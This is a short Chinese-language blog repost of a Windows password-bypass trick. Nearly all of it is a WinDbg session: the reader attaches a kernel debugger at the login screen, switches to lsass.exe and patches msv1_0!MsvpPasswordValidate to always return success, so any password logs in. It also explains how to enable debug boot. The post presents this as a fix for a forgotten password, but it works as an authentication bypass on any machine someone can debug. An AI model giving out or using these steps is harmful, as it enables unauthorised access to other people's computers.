在 http://www.nynaeve.net/?p=136 看到一个小技巧，转过来备份。

忘记了 Windows 密码时可以通过调试方式启动系统，连上内核调试器，在登陆界面处输入下面的命令：

kd> !process 0 0 lsass.exe
PROCESS 81378338 SessionId: 0 Cid: 01ac    Peb: 7ffd4000 ParentCid: 0174
    DirBase: 0acf9000 ObjectTable: e12dd2e8 HandleCount: 411.
    Image: lsass.exe

kd> .process /i 0x81378338
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
kd> g
Break instruction exception - code 80000003 (first chance)
nt!RtlpBreakWithStatusInstruction:
8081d97e cc              int     3
kd> .reload
kd> ba e1 msv1_0!MsvpPasswordValidate "g @$ra; r @al = 0x1; g"
kd> g

然后用任意密码就可以登陆系统，某些时候很有用。

如果没有设置调试启动项的，在启动时按 F8 键选择调试模式，Window 会缺省使用 COM2 端口，19200 波特率启动系统。Vista 系统上如果有 1394 口，会使用 1394 端口，缺省 channel 为 0。